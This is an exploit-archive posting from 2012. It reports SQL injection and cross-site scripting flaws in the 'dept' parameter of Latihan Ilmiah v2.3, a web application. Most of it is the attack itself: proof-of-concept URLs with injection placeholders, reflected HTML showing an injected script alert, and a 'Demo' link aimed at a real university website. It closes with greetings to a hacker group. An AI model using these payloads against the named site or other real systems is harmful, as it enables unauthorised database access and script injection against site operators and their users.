Home / exploits Latihan Ilmiah 2.3 Cross Site Scripting / SQL Injection
Posted on 09 October 2012
################################################## # Exploit Title: Latihan Ilmiah v2.3 Release <= SQLi /XSS Vulnerability # Date: 07/10/2012 # Author: Ryuzaki Lawlet # Web/Blog: http://justryuz.blogspot.com # 3Mail: ryuzaki_l@y7mail.com # Category: webapps # Google dork: - # Tested on: Linux +---------------------------------------------------+ [~]Exploit/p0c : http://localhost/index.php?file=notice&dept=[SQLi] http://localhost/index.php?file=notice&dept=[XSS] <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td bgcolor="#3399FF" class="font_title2"><div align="center">Announcement: <script>alert(100)</script> </div></td> </tr> <tr class="font_content_s"> <td><table width="100%" border="1" cellspacing="1" cellpadding="1" class="border1"> <tr bgcolor="#FBE3B7" class="font_title border1" > <td width="17%"><div align="center">Date</div></td> <td width="83%"><div align="center">Subject</div></td> </tr> </table></td> [~] Demo http://ilmiah.fsktm.um.edu.my/index.php?file=notice&dept=[xss] +---------------------------------------------------+ Greetz to : ./CyberSEC & Sofea Hana
